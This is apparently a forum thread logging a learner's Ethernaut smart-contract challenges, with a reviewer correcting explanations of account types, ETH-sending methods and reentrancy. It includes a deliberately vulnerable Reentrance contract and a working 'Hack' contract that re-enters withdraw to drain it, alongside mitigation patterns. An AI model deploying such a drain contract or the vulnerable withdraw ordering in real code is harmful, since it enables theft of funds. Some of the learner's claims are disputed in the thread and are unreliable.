My Coding Journey: From Finance to Smart Contract Auditor

This is the contract's fallback function.

The syntax of an anonymous (nameless) function has been deprecated for quite a long time (since around solc v0.4), and even though it is still allowed by the compiler, the official syntax is:

fallback() external payable
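
For example, a minimal sketch contrasting the two syntaxes (the contract name and event are mine, added for illustration):

// Deprecated anonymous syntax (accepted by pre-0.6.x compilers):
//     function() external payable { }

// Current syntax (0.6.x and later):
pragma solidity ^0.8.0;

contract Example {
    event Received(address sender, uint256 amount);

    // Handles plain ETH transfers with empty calldata.
    receive() external payable {
        emit Received(msg.sender, msg.value);
    }

    // Handles calls whose data matches no function selector
    // (and plain ETH transfers when no receive function exists).
    fallback() external payable {
        emit Received(msg.sender, msg.value);
    }
}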

P.S.: I hope that you've spent some time going through this response (above), as you may find some important insights in there.

1 Like

Ah I did think this looked a bit odd, and your explanation makes total sense so thank you again for explaining!

I'm so sorry I didn't directly respond to your other post - I've actually been meaning to, but wanted to do some further digging. I looked a little further into whether there is any added value in preventing a contract that doesn't implement a receive or fallback function from holding ETH, given that it can still end up with ETH at an address that already holds some. I agree with you that there is no added value in such a measure; for some reason I thought zero-value transfer scams might be an instance of this, but quickly realised that was not the case (that sort of scam is more about phishing and sending to the wrong address).

I also really liked your mention of an SCA; that really contextualised what I've been seeing in the various other code reviews I've looked into.

1 Like

Day 17:

I needed to dissect the King.sol contract a little further despite having the solution and helpful commentary from others. My primary source was provided by OpenZeppelin here, and it stepped through the real-life instance behind the previous smart contract challenge (called King of the ETH, or KotE).

Breaking down my learnings:

  • as commented by barakman and OZ: there are two fundamental account types - "externally-owned accounts" (EOAs, normally controlled by a human via a private key) and "contract accounts" (SCAs), which are controlled by the contract code deployed at their address;
  • the issue with this contract is that the client was asking users to create SCAs to hold their ether. By itself this was not a problem, but the gas allowance forwarded with the compensation payment (2300 gas - not enough to execute the transaction) caused the wallet contracts to fail; and
  • the flow-on effect of this was that when a wallet contract failed to process the payment sent to it by the KotE contract, the ETH paid was returned to the KotE contract. The logic behind the KotE contract meant that it did not recognise the operation had failed and it continued to process. What does this mean in plain English? The contract caller became the king despite the compensation payment not having been sent to the previous monarch.

I found contextualising the problem via the OZ website immensely helpful in understanding the contract logic, and a proper grasp of EOA and SCA accounts went a long way towards that understanding. I recommend others read the postmortem audit because it certainly makes you appreciate the need to test contracts extensively before deployment!!

1 Like

The wording here is somewhat partial and inaccurate, so let's rephrase that...

First off, here are the primary differences between these two account types:

+------------------+------------------------------+---------------------------------------+
| Account type     | Private key known to creator | Contract bytecode deployed at address |
+------------------+------------------------------+---------------------------------------+
| Externally owned | Yes                          | No                                    |
+------------------+------------------------------+---------------------------------------+
| Smart contract   | No                           | Yes                                   |
+------------------+------------------------------+---------------------------------------+

Second, let's clarify the meaning of "control".

The creator of an externally-owned account can use its private key in order to sign and execute the following types of transactions:

  1. Transfer ETH to another externally-owned account
  2. Transfer ETH to a smart-contract account
  3. Execute a function implemented in the bytecode deployed at a smart-contract account's address

Type 2 is essentially a special case of type 3, since transferring ETH to a contract can only take place as part of executing a function in that contract (when no function is specified, the receive function is executed if it is implemented, otherwise the fallback function is executed).

So in short, we can state that the creator of an externally-owned account is the one who controls this account via its private key.

The same statement cannot be applied for the creator of a smart-contract account, in the sense that the private key of that account is not known to its creator.

Here, the term "control" is used in a different perspective altogether, namely, this term is used for describing who can execute the smart-contract functions, where "who" stands for other accounts of both types (externally-owned accounts and smart-contract accounts).

And in order to restrict the execution of a function to only specific accounts, the creator of the smart contract needs to explicitly apply this restriction as part of the contract implementation, for example:

function func() external {
    if (msg.sender != address(0x1234567812345678123456781234567812345678)) {
        revert("only 0x1234567812345678123456781234567812345678 allowed");
    }
}

OpenZeppelin implements several different access-restriction mechanisms, which are widely accepted as a de-facto standard, and have therefore been thoroughly verified by a large community of developers.

1 Like

Thank you for further elaborating on the account types - I had understood it exactly as you laid out but my wording wasn't as eloquent as yours (especially with respect to your description of Type 2 - that was immensely helpful!!)

A huge thank you for forwarding the access-restriction mechanisms and providing that example. I think the only context in which I had really seen this in play (and correct me if I'm wrong) is role creation (e.g. defining an admin role, or a user gatekeeper role) in an NFT contract. For example, an admin role (often the owner) might restrict how many NFTs a user can own, implementing a restriction similar to your 'function func() external' example.

Out of curiosity, I'd love to get your perspective on any of the security issues raised from the KoTE contract I had linked in Day 17! I think you've got a better handle on the practical security issues mentioned in the postmortem.

1 Like

Day 18:

I have been building towards this challenge for a while because the issue it relates to is still very much alive in this space - reentrancy attacks!!

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.4/contracts/math/SafeMath.sol';

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}

Breakdown of the Contract

  • an older version of solidity is being used here so I immediately suspect legacy issues will play into the solution;
  • SafeMath is imported, which if you remember, deals with the issues relating to under/overflow in a contract;
  • a public mapping named 'balances' maps each address to a uint balance;
  • the publicly executable 'donate' function takes an address _to, and the donated amount (msg.value) is added to that address's balance ('balances[_to]');
  • the public view function 'balanceOf' (taking an address parameter _who) returns the uint balance of _who;
  • the publicly executable function 'withdraw' takes a uint _amount; if balances[msg.sender] >= _amount, it sends _amount of ETH to msg.sender via a low-level call (the empty string "" is the call data, not a value), and only afterwards subtracts _amount from the sender's balance. Note that the balance update happens after the external call - this ordering is what makes the contract vulnerable (see the hardened sketch after this list); and
  • the empty receive function allows the contract to receive plain ETH transfers.
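
For contrast, a hardened version of withdraw (just a sketch of mine, not part of the challenge) would apply the balance update before the external call, in line with the checks-effects-interactions pattern:

  function withdraw(uint _amount) public {
    require(balances[msg.sender] >= _amount, "insufficient balance"); // check
    balances[msg.sender] = balances[msg.sender].sub(_amount);         // effect
    (bool result,) = msg.sender.call{value:_amount}("");              // interaction
    require(result, "transfer failed");
  }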

The Solution
One tip before getting started: you will need the 3.4.0 version of the SafeMath contract stored on the OZ GitHub. To do this, click on the MASTER option in branches, switch to 3.4.0, look in the contracts folder for SafeMath.sol, then import that URL into your challenge contract to ensure it compiles properly. I have done this in my code above for your convenience.

  • first, understand a reentrancy attack. The way I understand its logic is as follows: 1) the attacker sends 1 ETH to a contract, 2) the attacker then withdraws this amount via the withdraw function, 3) the attacker's contract contains a receive/fallback function that is triggered when the withdraw function sends ETH back to it, 4) that function calls withdraw again, creating a loop that continues until the target is drained of its funds;
  • to spot a risk of reentrancy attacks, I always look for instances where the contract interacts with external points (for example, the withdraw function interacts with a third party by sending ETH external to the contract); and
  • implementing both of the above, my solution was: call the withdraw function after sending some amount of ETH; this triggers the malicious fallback function, causing a loop that will continue until the contract is fully drained of its funds.

I'll post code for my attack tomorrow but I want to give others a chance to digest the above before doing so / ask any questions / critique my understanding so I can walkthrough the code.

1 Like

Not true if msg.sender is a contract which does not implement a payable receive function or a payable fallback function.
In other words, msg.sender is a "non-payable" contract which implements a function which executes new King(), and someone has executed that function.


That's wrong.
First of all, they are not "a function that can receive ETH", they are addresses.
Second, the constructor merely stores these input addresses into the contract state variables.
Third, there isn't any straightforward, clean, simple and cheap way to check if an address can receive ETH. At least not onchain (i.e., in a contract code). Doing it offchain (e.g., in web3.js script) is pretty simple, and of course - doesn't cost any gas.


FYI, you may as well just declare address public king (like you do with each one of the other two state variables).
The compiler will then implicitly generate a public function of the same name (king), which returns the value of that variable.
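
For example, a minimal sketch (the contract names are mine):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract KingGame {
    // The compiler auto-generates: function king() external view returns (address)
    address public king;
}

// ...which is roughly equivalent to writing the getter yourself:
contract KingGameExplicit {
    address private _king;

    function king() external view returns (address) {
        return _king;
    }
}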


Well, you haven't quite stated up until this point what the problem is, so jumping to "The Solution" here is a bit confusing. But anyway, here are the problems that I see in this contract:

Problem #1 - Financial Incentive

First of all, every time an account which is not the owner transfers an amount of ETH to your contract:

  • If that amount is smaller than the current value of prize, then the transaction reverts, and the caller has spent gas for nothing
  • If that amount is equal to or larger than the current value of prize, then the caller gets it back and ends up spending gas for nothing

The latter bullet applies to the owner account regardless of the amount of ETH.
So in short, there is absolutely no incentive for anyone to ever use your contract.

Problem #2 - Receiving ETH

There are two potential issues in your contract's receive function:

  1. It might be subjected to reentrancy
  2. It might revert due to gas stipend

The account sending ETH to your contract can be any one of 5 different types.
The account pointed by address king can be any one of 5 different types.

Let's denote these types:

  1. EOA
  2. SCA which does not implement a receive or fallback function
  3. SCA which implements a receive or fallback function which does not send ETH back to msg.sender
  4. SCA which implements a receive or fallback function which sends ETH back to msg.sender via send or transfer
  5. SCA which implements a receive or fallback function which sends ETH back to msg.sender via call

So all in all, you have 25 different scenarios, under which you need to inspect each one of the 2 potential issues above.
I'm obviously not going to list all of them, but here are a couple of points which you'd need to take into account:

Point 1

When contract X receives ETH from a function in contract Y via transfer or send executed in that function, the function in contract X (receive or fallback) is limited by a stipend of 2300 gas.
In your contract, that function updates two state variables (king and prize) which are located in two separate storage slots.
And updating even a single storage slot is likely to exceed that gas stipend.
At the time of writing this:

  • Around 2100 gas if the variable's value doesn't change
  • Around 5000 gas if the variable's value changes from non-zero to non-zero
  • Around 22100 gas if the variable's value changes from zero to non-zero

Hence you may be facing a bunch of scenarios in which an attempt to send ETH to your contract would revert due to gas stipend (issue #2 above).
This is not to say that there's an actual problem here.
In fact, it might even be desirable in the sense that it prevents reentrancy attacks (issue #1 above).
But you'd still need to look into this under the perspective of product requirements.
In other words, you'd need to ask yourself if there's a product requirement for supporting a specific scenario, which is not handled as desired.
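
To make Point 1 concrete, here is a rough sketch of a receive function of that shape (not your exact code, just the pattern described above, with the king/prize/owner names taken from this discussion):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract KingSketch {
    address payable public king;
    uint256 public prize;
    address public owner;

    receive() external payable {
        require(msg.value >= prize || msg.sender == owner);
        king.transfer(msg.value);   // pay out the previous king
        king = payable(msg.sender); // storage write #1
        prize = msg.value;          // storage write #2
    }
}

If this receive function is itself entered via transfer or send from another contract, it has only 2300 gas to work with, which the two storage writes alone would exceed.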

Point 2

When contract X receives ETH from a function in contract Y via call executed in that function, the function in contract X (receive or fallback) is NOT limited by any gas stipend.
This may open your contract's receive function to reentrancy attacks.
In your specific case, it is not really clear what could possibly be achieved by such an attack, other than the attacker spending their own ETH.
But you should nevertheless look into this under the perspective of security vulnerabilities.

1 Like

Well, I've responded to your Day 16 post instead (see here).

Your Day 17 is not very clear to me in general, and in particular the following statement:

the flow-on effect of this was that when a wallet contract failed to process the payment sent to it by the KotE contract, the ETH paid was returned to the KotE contract. The logic behind the KotE contract meant that it did not recognise the operation had failed and it continued to process. What does this mean in plain English? The contract caller became the king despite the compensation payment not having been sent to the previous monarch.

The part "did not recognise the operation had failed and it continued to process" seems plain wrong.

Your contract function executes payable(king).transfer(msg.value);, which means that if the other contract (pointed by king) fails to receive the ETH, then your contract function reverts at this point and does not "continue to process" anything.

That statement would be correct if your contract function used send or call instead of transfer.


Here are the primary differences between these ETH-sending options:

A function in your contract can send ETH to another contract only if that other contract implements a receive function or a fallback function.

There are 3 ways for you to implement it in your contract function:

  1. Using to.transfer(amount)
  2. Using bool sent = to.send(amount)
  3. Using (bool sent, bytes memory data) = to.call{value: amount}("")

Where to is the address of the other contract.

With options 1 and 2, the other contract's receive and fallback functions revert upon spending more than 2300 gas. Of course, they may also revert for other reasons, depending on their actual implementation.

With option 3, the other contract's receive and fallback functions DO NOT revert upon spending more than 2300 gas. And again, they may also revert for other reasons, depending on their actual implementation.

Going back to YOUR contract function, its behavior upon a revert in the OTHER contract's function is:

  • If you use option 1 (transfer), then your contract function immediately reverts.
  • If you use option 2 (send), then your contract function receives sent = false.
  • If you use option 3 (call), then your contract function receives sent = false.

As you can see:

  • With option 1, you don't need to worry about your contract continuing to process
  • With option 3, you don't need to worry about the other contract's gas consumption
  • With option 2, you need to worry about BOTH of these aspects
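
A minimal sketch of the three options side by side (the contract and function names are mine):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Payer {
    // Option 1: reverts the whole transaction if the recipient's
    // receive/fallback fails (only 2300 gas is forwarded).
    function payWithTransfer(address payable to) external payable {
        to.transfer(msg.value);
    }

    // Option 2: also forwards only 2300 gas, but returns false on failure,
    // so the caller must check the result explicitly.
    function payWithSend(address payable to) external payable {
        bool sent = to.send(msg.value);
        require(sent, "send failed");
    }

    // Option 3: forwards all remaining gas and returns false on failure.
    function payWithCall(address payable to) external payable {
        (bool sent, ) = to.call{value: msg.value}("");
        require(sent, "call failed");
    }
}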

Lastly, regarding:

Well, I obviously can't correct you on what you've seen.
But I can tell you that your conclusion of it is probably wrong.
AFAIK, the most widely used access-restriction mechanism, which also happens to be the oldest one and the simplest one (probably the reason for it being the most widely used one), is Ownable.
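
For example, a minimal sketch of Ownable in use (assuming an OpenZeppelin 4.x import path; in 5.x the constructor additionally takes an initial owner argument):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/access/Ownable.sol";

contract Treasury is Ownable {
    // onlyOwner reverts unless msg.sender is the current owner.
    function sweep(address payable to) external onlyOwner {
        to.transfer(address(this).balance);
    }
}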

1 Like

Not true if msg.sender is a contract which does not implement a payable receive function or a payable fallback function.
In other words, msg.sender is a "non-payable" contract which implements a function which executes new King(), and someone has executed that function.

But in this case, having regard to the rules that specify you will have to send ETH or receive ETH to participate, how likely is it that there wouldn't be a payable receive or fallback function?

First of all, they are not "a function that can receive ETH", they are addresses.
Second, the constructor merely stores these input addresses into the contract state variables.
Third, there isn't any straightforward, clean, simple and cheap way to check if an address can receive ETH. At least not onchain (i.e., in a contract code). Doing it offchain (e.g., in web3.js script) is pretty simple, and of course - doesn't cost any gas.

Noted on your first and second points - good pickup. On your third point, with respect to a web3.js script, would you do this via web3.eth.getAccounts(console.log) to check that 1) the address is correct and 2) it is capable of sending/receiving ETH?

Well, you haven't quite stated up until this point what the problem is, so jumping to "The Solution" here is a bit confusing. But anyway, here are the problems that I see in this contract:

I had mentioned that the objective was to break the game in the final line of the instructions:

When you submit the instance back to the level, the level is going to reclaim kingship. You will beat the level if you can avoid such a self proclamation.

but agree with your point, perhaps could have been better phrased.

On your points outlined in Problem #1, agreed that there is no incentive to contribute smaller amounts of ETH. However, if your amount is larger, given the rules of the game, my read was that you would become king (effectively returning the gas cost and ETH to a previous player), gradually building a reserve from which you may be paid. But from a financial perspective, I 100% agree with you, I don't know why anyone would play this game... for fun supposedly...

On your Problem #2 analysis, that was honestly excellent to read. I had considered that the gas stipend would be an issue, but the way you broke that down, together with the reentrancy attacks, was really insightful. I have a fair amount of work to do in terms of thinking about things from a product requirement / security vulnerability perspective.

1 Like

Again, thank you for your reply to Day 16 - on Day 17, I was looking at the actual commercial context that the Ethernaut challenge was based off (link found in Day 17) to better inform my analysis contained at Day 16. Therefore, there may have been a bit of a mix-up between our analyses!

In light of the above, I still really enjoyed reading your breakdown of the ETH-sending options. I hadn't seen either option 2 or 3 used before, so it was really informative to read 1) how they may revert and 2) whose gas consumption would be considered if a certain measure was implemented.

On this:

I agree and I understand where you are coming from. I was more interested to hear from you what projects you had seen / worked on that may have used a complex variation of access-restriction mechanisms.

1 Like

My comment wasn't about likelihood or probability; it was referring strictly to your claim of msg.sender being a payable address, which isn't true in all cases. Specifically, it is false when a "non-payable" contract is the "sender" (i.e., the account which executes your contract function).


First of all, you obviously can't send ETH from a smart-contract account using an offchain script.
Second, the ability of a contract to send ETH has nothing to do with its ability to receive ETH.
In order to determine that ability from an offchain script, I would sign a transaction with:

  • data = ""
  • value = 1
  • to = contractAddress

And then try to call estimate_gas on that signed transaction.
If it returns a gas-estimate value successfully, then the contract can receive ETH.
If it throws a "transaction reverted" exception, then the contract cannot receive ETH.
2 Likes

Day 19:

Following on from my Reentrance Ethernaut challenge, I used the following code to complete it (with the objective being to drain the contract of its ETH entirely):

pragma solidity ^0.8;

interface IReentrancy {
    function donate(address) external payable;
    function withdraw(uint256) external;
}

contract Hack {
    IReentrancy private immutable target;

    constructor(address _target) {
        target = IReentrancy(_target);
    }

    function attack() external payable {
        target.donate{value: 1e18}(address(this));
        target.withdraw(1e18);

        require(address(target).balance == 0, "target balance > 0");
        selfdestruct(payable(msg.sender));
    }

    receive() external payable {
        uint256 amount = min(1e18, address(target).balance);
        if (amount > 0) {
            target.withdraw(amount);
        }
    }

    function min(uint256 x, uint256 y) private pure returns (uint256) {
        return x <= y ? x : y;
    }
}

Analysis of my solution

  • the 'interface' declaration exposes the Ethernaut Reentrance contract's 'donate' and 'withdraw' functions so the Hack contract can call them;
  • the constructor takes the address of the deployed Reentrance instance (the target) and stores it in the immutable 'target' variable;
  • the attack function first calls donate (sending 1 ETH, denominated as 1e18, credited to this contract's balance) and then calls withdraw. When withdraw sends ETH back to this contract, the receive function is triggered, which calls withdraw again, creating a loop; and
  • 'uint256 amount = min(1e18, address(target).balance)' caps each re-entrant withdrawal at the smaller of 1 ETH and the target's remaining balance, ensuring the target's address is drained entirely, with 'min' being the quick math specified at the bottom.

Further Analysis
I also noticed that OZ is quoted as saying the following:

Pull-payments are often considered the best practice when it comes to sending Ether, security-wise. It prevents recipients from blocking execution, and eliminates reentrancy concerns.

I thought I'd flag this statement as I intend to delve a little further into it and other external sources like Consensys Diligence's post, the DAO hack, and OZ's very own Reentrancy After Istanbul.

Stay tuned!!

1 Like

How exactly would that return the gas cost to anyone?

Well, amount > 0 is obviously ALWAYS true, hence executing target.withdraw(amount) will probably revert the transaction when the actual balance of the target contract is smaller than 1e18.

Probably, because it is not entirely clear what function withdraw does, so I'm just guessing by its name, that it transfers the input amount (of ETH) from the contract to the caller of that function.

So it is not really clear why you're setting that input amount to a minimum of 1e18.

Also not clear, is how exactly a reentrancy-attack is to be conducted here:

  • Who is the caller
  • What function is called and in which contract
  • Which function is being re-entered as a result

I need to explain myself a bit more on this point.

Here are the contract rules taken directly from the defunct project:

Suppose - for example - the current throne claim price is 10 ETHER. (To find out what it really is, see below.)
You like the sound of being the Monarch, so you send 10 ETHER to the contract.
This makes you the illustrious new King of the Ether. Your name will be added to the Hall of Monarchs in the blockchain.
The contract will then send your 10 ETHER (less a small commission) to the previous Monarch you have usurped, as compensation.
The claim price for the throne will then go up by 33%, to 13.3 ETHER. (It eventually stops increasing at 100000 ETHER for safety).
If an usurper comes along who is willing to pay 13.3 ETHER, she will depose you and become Queen, and you will receive her payment of 13.3 ETHER (less a small commission) as compensation - a tidy profit for you.
However, an ancient curse applies to the throne: every Monarch dies once their reign reaches 14 days. No compensation is paid if this happens, and the claim price for the next monarch is reset back to the original starting price of 500 FINNEY (0.5 ETHER).
But surely a successor will appear within 14 days, and even if they don't, you'll be immortalised in the blockchain at least ...

I read the above to mean the amount you have spent on gas will be reimbursed to you on your eventual usurping.

On your first point, I'd think you want to break the reentrancy loop, don't you? You wouldn't want to have a contract that continues to call withdraw whilst nothing remains in the contract. Is your suggestion to set the amount to exactly 0?

Your understanding here is correct.

  • We are utilising this contract to call the Reentrance contract deployed at the instance address provided by OZ.
  • the attack function is being called in the Hack contract and interacts with the Reentrance contract as described below; and
  • the withdraw function works via the following logic: 1) a user calls the attack function (requiring 1 ETH to be donated in the process), 2) the attack function then calls 'withdraw' on the Reentrance contract, which it is able to do since it has deposited 1 ETH, 3) on receipt of the ETH, receive() is triggered, which calls the withdraw function again (creating a loop) because the amount (specified as the lower of 1 ETH and the target balance) is greater than 0.

And exactly what method in your contract makes sure that "gas will be reimbursed to you"?

Gas payment in ETH units goes to the miner of your user's transaction.

Where exactly in your code, does the contract function find what amount of ETH the caller of that function has paid for gas, and where exactly does it send that amount back to the caller?

I think there's been some miscommunication here.

I am not referring to my code that I've posted here. I am referring to the KoTE github where there is an informal process to refund some of the gas fee.

1 Like

Day 20:

I have done some further research as it relates to reentrancy attacks and have compiled various points I have found (along with their sources) below:

Pullpayment Relevant source
I note that OZ says to 'implement a pull-payment strategy to mitigate reentrancy concerns'. For me I thought... okay, but what is that strategy (maybe it's me being new to the lingo)? Breaking it down to its core:

  • pull-payment means the paying contract doesn't interact directly with the receiver account, which must withdraw its payments itself;
  • considering the above Reentrance contract, this makes sense from a security perspective, given a user could otherwise interact directly with a contract that implements a malicious fallback function which continually calls a withdraw function (thus draining the contract); and
  • to implement this pattern in a contract, inherit from OZ's PullPayment and use _asyncTransfer as opposed to transfer. Think of the difference as follows: instead of sending the funds to the receiver, _asyncTransfer moves them to an escrow contract (I have also seen others describe this as the receiver "pulling" funds out of a contract as opposed to the contract "pushing" funds to a receiver) - see the sketch after this list.
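
A minimal sketch of the pattern (the contract and function names other than PullPayment, _asyncTransfer and withdrawPayments are mine; assuming an OpenZeppelin 4.x import path - PullPayment was removed in 5.x):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/security/PullPayment.sol";

contract Auction is PullPayment {
    address public highestBidder;
    uint256 public highestBid;

    function bid() external payable {
        require(msg.value > highestBid, "bid too low");
        if (highestBidder != address(0)) {
            // Instead of pushing the refund to the outbid bidder (which could
            // revert or re-enter), record it in escrow for later withdrawal.
            _asyncTransfer(highestBidder, highestBid);
        }
        highestBidder = msg.sender;
        highestBid = msg.value;
    }

    // The outbid bidder later calls the inherited withdrawPayments(payable(theirAddress))
    // to pull the refund out of escrow themselves.
}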

Check Effects Relevant source
This is another strategy designed to mitigate reentrancy attacks, and it makes practical sense when you think about it (i.e. check the contract's state and update it before making any further external calls). I'd note that a similar theme came up with the earlier compiler versions we've discussed, where unchecked math resulted in under/overflows. It is implemented in a way such as this:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.6.0 <0.9.0;

contract Fund {
    /// @dev Mapping of ether shares of the contract.
    mapping(address => uint) shares;

    /// Withdraw your share.
    function withdraw() public {
        uint share = shares[msg.sender];
        shares[msg.sender] = 0;
        payable(msg.sender).transfer(share);
    }
}

Another note about Checks-Effects-Interactions: calls to functions in other contracts (the Interactions) should only be made after all planned state changes have been written to storage.

Consensys Article (linked above)
Context to the article is that in 2019, discussions were focused on EIP 1884 (an Ethereum Improvement Proposal). The effect of its implementation was to increase the gas cost of certain operations, breaking contracts whose fallback functions previously fit within 2300 gas but would now exceed it. This 2300 number is important because this is the amount of gas a contract's fallback function receives if it's called via Solidity's transfer() or send() methods.

The TL;DR of this article is that transfer() and send() should be avoided because:

  • gas costs can increase due to opcodes (the operation codes governing the resources consumed by an operation) being underpriced at the time, with forecasts pointing to greater resource consumption;
  • using call() avoids a hard dependency on gas costs and is a viable alternative;
  • use check-effects-interactions pattern - see above; and
  • use a reentrancy guard - an explicit check that detects and rejects re-entrant calls; an example is the following:
contract Guarded {
    ...

    bool locked = false;

    function withdraw() external {
        require(!locked, "Reentrant call detected!");
        locked = true;
        ...
        locked = false;
    }
}

Well, the 2nd bullet obviously makes the 1st bullet redundant (historically, the 1st bullet was the recommended method prior to the introduction of the 2nd bullet as an ad-hoc reentrancy protection).


Using transfer actually ensures the desired behavior in a wide range of typical use-cases.

Specifically, because:

  1. Unlike send, it reverts the transaction upon failure
  2. Unlike call, it imposes a gas restriction upon entering the contract (receive or fallback) function, which effectively prevents any type of malicious behavior such as a reentrancy attack